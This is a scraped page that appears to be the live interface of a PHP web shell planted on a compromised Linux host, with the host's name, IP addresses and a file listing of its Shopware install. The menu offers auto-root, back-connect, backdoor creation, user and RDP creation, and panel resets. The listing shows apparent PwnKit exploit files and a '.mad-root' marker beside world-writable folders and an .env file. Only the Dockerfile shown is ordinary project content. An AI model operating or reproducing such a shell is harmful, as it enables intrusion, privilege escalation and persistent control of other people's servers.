Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 18.118.170.186
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
addify5 /
public_html /
shopware /
testingmodule /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
COMPOSER_HOME=~
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
custom
[ DIR ]
drwxrwxrwx
files
[ DIR ]
drwxrwxrwx
public
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
var
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.env
1.39
KB
-rw-rw-rw-
.htaccess
420
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.uniqueid.txt
32
B
-rw-rw-rw-
Dockerfile
1.48
KB
-rw-r--r--
PLATFORM_COMMIT_SHA
41
B
-rw-r--r--
README.md
10.02
KB
-rw-r--r--
composer.json
3.28
KB
-rw-r--r--
composer.lock
522
KB
-rw-r--r--
easy-coding-standard.php
6.27
KB
-rw-r--r--
index.html
2.7
KB
-rw-r--r--
install.lock
12
B
-rw-r--r--
install_v6.4.16.1_6ffe606132f2...
100.34
MB
-rwxrwxrwx
license.txt
1.03
KB
-rwxrwxrwx
phpstan.neon
209
B
-rw-r--r--
phpunit.xml.dist
2.83
KB
-rw-r--r--
psalm.xml
1.84
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dockerfile
FROM alpine:3.13 ENV COMPOSER_HOME=/var/cache/composer ENV PROJECT_ROOT=/sw6 ENV ARTIFACTS_DIR=/artifacts ENV LD_PRELOAD=/usr/lib/preloadable_libiconv.so RUN apk --no-cache add \ nginx supervisor curl zip rsync xz coreutils \ php7 php7-fpm \ php7-ctype php7-curl php7-dom php7-fileinfo php7-gd \ php7-iconv php7-intl php7-json php7-mbstring \ php7-mysqli php7-openssl php7-pdo_mysql \ php7-session php7-simplexml php7-tokenizer php7-xml php7-xmlreader php7-xmlwriter \ php7-zip php7-zlib php7-phar php7-opcache php7-sodium git \ gnu-libiconv \ && adduser -u 1000 -D -h $PROJECT_ROOT sw6 sw6 \ && rm /etc/nginx/conf.d/default.conf \ && mkdir -p /var/cache/composer # Copy system configs COPY config/etc /etc # Make sure files/folders needed by the processes are accessible when they run under the sw6 RUN mkdir -p /var/{lib,tmp,log}/nginx \ && chown -R sw6.sw6 /run /var/{lib,tmp,log}/nginx \ && chown -R sw6.sw6 /var/cache/composer WORKDIR $PROJECT_ROOT USER sw6 ADD --chown=sw6 . . RUN APP_URL="http://localhost" DATABASE_URL="" bin/console assets:install \ && rm -Rf var/cache \ && touch install.lock \ && mkdir -p var/cache # Expose the port nginx is reachable on EXPOSE 8000 # Let supervisord start nginx & php-fpm ENTRYPOINT ["./bin/entrypoint.sh"] # Configure a healthcheck to validate that everything is up&running HEALTHCHECK --timeout=10s CMD curl --silent --fail http://127.0.0.1:8000/fpm-ping
Close